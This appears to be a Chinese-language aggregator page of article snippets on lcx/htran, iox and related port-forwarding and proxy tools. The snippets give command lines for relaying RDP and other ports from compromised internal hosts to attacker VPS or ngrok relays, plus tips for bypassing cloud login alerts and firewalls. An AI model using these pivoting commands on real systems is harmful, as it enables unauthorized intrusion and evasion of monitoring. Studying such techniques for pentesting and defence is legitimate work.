展开

关键词

lcx实现端口转发

lcx实现端口转发概念比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。 所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的网络出口做端口映射,这就体现lcx的作用了。 lcx实现端口转发,将肉鸡A上的某个端口(常用的3389),转发到具有公网地址的主机B上,这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。

25410

Lcx内网端口转发

工具介绍Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap)前期准备:公网主机vps:103.45.99.224受害机内网ip:127.0.0.1工具可能会被杀软查杀

24820
  • 广告
    关闭

    云产品限时秒杀

    云服务器1核2G首年50元,还有多款热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Lcx的多种用法:3个功能+9个参数,你会怎么玩?

    关于那篇文章大概意思是说连接内网的3389需要4步:1:确定被控制计算机的内网ip2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”3:本机执行”lcx 端口转发:Lcx -Listen Lcx -slave 所以既然我们只需要连接那台服务器,我们只需要设置目标ip参数为127.0.0.1就好了(127.0.0.1 Localhost 即本机)因为别忘了 1、本机执行lcx -listen 40050 10000?2、被控制服务器执行 lcx -slave 1.1.1.1 40050 10.10.0.3 3389? 2、 希望刚入门的朋友可以多参照这篇文章使用lcx来进行内网渗透。 所谓的lcx.exe其实是lcx根据lion的代码所修改编译过的htran,所以这个工具其实不应该叫lcx,不过为了配合大家的习惯这么叫而已,可以看作是简化版本吧。

    86360

    教你学木马攻防 | 隧道木马 | 第一课

    第三节lcx lcx是一款内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。这个工具很早就已经有了,现在已经有跨平台的了,支持在windows、linux下使用。 还有一些根据lcx源码开发的其他版本,比如jsp版,http隧道版等等。 代码如下:https:github.comwindworstLCX下面说一下它的使用以及功能说明:Usage of Packet Transmit: .lcx - .lcx -about -listen 在主机C上监听8080和8081端口:.lcx -listen 8080 8081在主机B上连接22端口,并连接主机C的8081端口:.lcx -slave 192.168.1.5 22 10.10.10.1 第四节取代lcx 使用工具很简单,但是对这些工具的封锁也很简单。这些开源的网络安全工具早就处于防御端的黑名单里。因此自己写一个类似的工具也是一项必备的能力。

    30810

    iox:一款功能强大的端口转发&内网代理工具

    iox是一款功能强大的端口转发&内网代理工具,该工具的功能类似于lcx和ew,但是iox的功能和性能都更加强大。实际上,lcx和ew都是非常优秀的工具,但还是有地方可以提升的。 再比如说,运行“lcx -slave 1.1.1.1 8888 1.1.1.1 9999”命令时,lcx会以串行的方式连接两个主机,但是并发连接两个主机会更高效,毕竟是纯IO操作,而iox就是以这种更高效的方式实现的 iox fwd -l 8888 -l 9999 for lcx: .lcx -listen 8888 9999监听0.0.0.0:8888,把流量转发到1.1.1.1:9999。. iox fwd -l 8888 -r 1.1.1.1:9999 for lcx: .lcx -tran 8888 1.1.1.1 9999连接1.1.1.1:8888和1.1.1.1:9999, 在两个连接间转发流量 iox fwd -r 1.1.1.1:8888 -r 1.1.1.1:9999 for lcx: .lcx -slave 1.1.1.1 8888 1.1.1.1 9999proxy模式:在本地 0.0.0.0

    1.1K10

    Metaspolit下配合Ngrok同时实现内网反弹+转发

    Kali地址:192.168.61.130(攻击机地址)靶机win2008: 192.168.61.134(模拟外网私人地址)中间跳板ngrok :vipgz4.idcfengye.com工具:lcx 由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。 二、转发3389端口到本地1.在Kali中执行lcx监听和转发命令:.portmap -m 2 -p1 8848 -p2 33891P1为本地监听的端口(与ngrok转发的端口一致)P2为本地转发的端口 2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389slave后跟Ngrok

    28320

    【内网渗透】关于内网代理转发技术

    Part.0目录 一、端口转发类1.Lcx本地端口转发正向端口转发 反向端口转发 Linux版lcx2、Netsh本地端口转发 正向端口转发 3、SSH二、SOCKS代理类 1、reGeorgreGeorg 但因为防火墙等访问控制策略,不允许公网直接访问3389端口,此时可以尝试lcx的本地转发功能将其转发到其他端口。 Linux版lcxLinux版本的lcx叫做portmap先将对应的c文件上传至linux服务器中:?通过gcc进行编译后即可使用:gcc portmap.c -o lcx? 功能与windows版一样,例如将流量正向转发至外网服务器的3389端口:.lcx -m l -p1 8888 -h2 192.168.3.140 -p2 3389? 与LCX不同,netsh不支持反向的端口转发。本地端口转发:?

    60710

    内网中使用metasploit进行渗透测试

    以前总是使用lcx做端口转发连接站点的3389,是否也可以用lcx将metasploit和站点两个内网ip进行连接?发现是可行的。具体操作步骤如下:网络环境:由于物理机+虚拟机搭建环境所以如下模拟:? 大概过程如下:1.在公网ip机器上(thinkpad物理机,ip:192.168.253.1)使用lcx建立监听两个端口300,200?

    61880

    云主机RDPSSH异地登陆提醒绕过

    0x02 绕过异地登录提醒这里以Portfwd和Lcx绕过腾讯云主机的异地登录提醒为例来做演示,其实就是通过当前已控制主机的流量来连接它的RDPSSH。 1、Lcx服务端执行lcx.exe -listen 13389 23389.portmap -m 2 -p1 13899 -h2 127.0.0.1 -p2 233892、Lcx客户端执行 lcx.exe 端口转发、Socks45代理和隧道等技术;2) RAT远控、AnyDesk、TeamViewer等工具;3) 结束或停止某云主机上的监控相关进程和服务;0x04 题外话可能有的人会说,这不就是一个简单的LCX

    17650

    常见端口转发工具的使用方式(二)

    至此已经拿到了目标机器cmd权限ngrok结合lcx使用转发3389端口目标机器:lcx -slave server.ngrok.cc 33388 127.0.0.1 3389? 本地指定监听:lcx -listen 9991 33389?然后连接我们本地的33389端口: ?

    63580

    常见端口转发工具的使用方式

    用法: lcx - -listen -tran -slave 这里我们转发windows3389端口做演示win2003服务端:lcx -slave 公网ip port 本地ip 3389? win7客户端:lcx -listen port port 注意这里的端口为空闲端口?进行连接验证:连接win7的33389端口进行登陆??

    3.6K150

    代理与转发常用工具汇总

    转发工具windowslcx.exe(没有测试成功)第一种用法: 1.1.1.1: lcx -listen 1111 2222 2.2.2.2: lcx -slave 1.1.1.1 1111 3.3.3.3 第二种用法: 1.1.1.1: lcx -tran 2222 2.2.2.2 3389然后,访问1.1.1.1的2222端口,就相当于访问了2.2.2.2的3389端口。

    37820

    记一次绕过防火墙反弹转发姿势小结

    常规环境遇到内网时都是直接使用Lcx把指定端口给转发出来即可,但是如果遇到防火墙时又该如何绕过呢?这里我根据实践测试过程写了这篇记录文章。 0x02 Lcx常规内网环境可以直接使用Lcx.exe将指定端口转发出来,然后在本地连接1234端口即可。 Lcx、2. Aspx Client、3.1 Reverse_tcp、3.3 Reverse_http、3.3 Reverse_https Ⅱ. 常规环境遇到内网时都是直接使用Lcx把指定端口给转发出来即可,但是如果遇到防火墙时又该如何绕过呢?这里我根据实践测试过程写了这篇记录文章。 0x02 Lcx常规内网环境可以直接使用Lcx.exe将指定端口转发出来,然后在本地连接1234端口即可。

    23720

    米斯特白帽培训讲义 漏洞篇 提权

    之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388,可以看到lcx中显示了转发的信息。? 远程连接客户端的封包会发给主机的lcx,之后会发给肉鸡的lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。等待一会儿之后,我们成功连接了肉鸡的远程桌面:?

    27040

    内网漫游之SOCKS代理大结局

    传统的方法是利用nc、lcx等工具,进行端口转发。适用端口转发的网络环境有以下几种:服务器处于内网,可以访问外部网络。服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接。 对于以上三种情况,lcx可以突破1和2二种,但是第3种就没有办法了,因为lcx在使用中需要访问外部网络。这里的第3种就可以用到我们今天重点要讲的SOCKS代理。 0×03 socket端口转发首先我们介绍下最为经典也是使用最为频繁的端口转发工具lcx,lcx.exe 是一个基于 socket 套接字实现的端口转发工具,它是从 linux 下的htran 工具移植到 Lcx工具实现的是一对一的端口转发,如果想访问右侧网络中列出的所有端口,就必须一次次的重复lcx的转发过程,效率相当低下。而且服务器都是有装有杀毒软件的,即使有做免杀也不能保证绕过所有的杀毒。 0×04 SOCKS代理工具socks代理其实也可理解为一个增强版的 lcx,它在服务端监听一个服务端口,当有新的连接请求时会从socks协议中解析出访问目标的URL的目标端口,再开始执行lcx的具体功能

    90010

    浅谈内网端口转发

    开门见山lcx端口转发前提是在端口转发的时候需要一台公网服务器,lcx是一款轻便的端口转发工具,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便 ,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。 在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面 故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。?

    98010

    reverse_tcp反向连接在实战中的应用

    先把C:Program Files (x86)FileZilla Server文件夹打包到我们本地,然后再用lcx把Filezilla Server的14147端口转发出来,lcx执行命令如下。 C:>lcx.exe -listen 51 14147 目标机器执行: c C:aspSmartUploadlcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx

    34820

    Linux端口转发的几种常用方法

    socat TCP4-LISTEN:12345,reuseaddr,fork TCP4:192.168.172.131:2207、 portmap 端口转发Linux 版的lcx,内网端口转发工具。 portfwdsrcmake(2)将本地的12345端口转发到192.168.172.131:22 .tcpfwd 0.0.0.0:12345 192.168.172.131:2209、NATBypass端口转发一款lcx

    11.1K21

    米斯特白帽培训讲义(v2)漏洞篇 提权

    之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388,可以看到lcx中显示了转发的信息。? 远程连接客户端的封包会发给主机的lcx,之后会发给肉鸡的lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。等待一会儿之后,我们成功连接了肉鸡的远程桌面:?

    51430

    渗透测试之端口转发与代理 常用端口转发方法

    advfirewall firewall delete rule name=transit test2 dir=in program=c:testrinetd.exe3、使用HTran实现端口转发注:lcx 恢复规则iptables-restore  etcrinetd.conf(3)启动.rinetd.exe(4)结束进程pkill -9 rinetd3、使用HTran实现端口转发Linux版HTran(lcx )的源码参考如下地址:https:github.comwindworstLCX需要使用gcc重新编译(1)开启转发功能.lcx -tran 8888 192.168.111.103 4444注:go语言编写的 HTran(lcx),优点是跨平台,支持Windows和Linux下载地址:https:github.comcw1997NATBypass4、使用EarthWorm实现端口转发下载地址:https:github.comrootkiterEarthWorm

    1.8K30

    扫码关注云+社区

    领取腾讯云代金券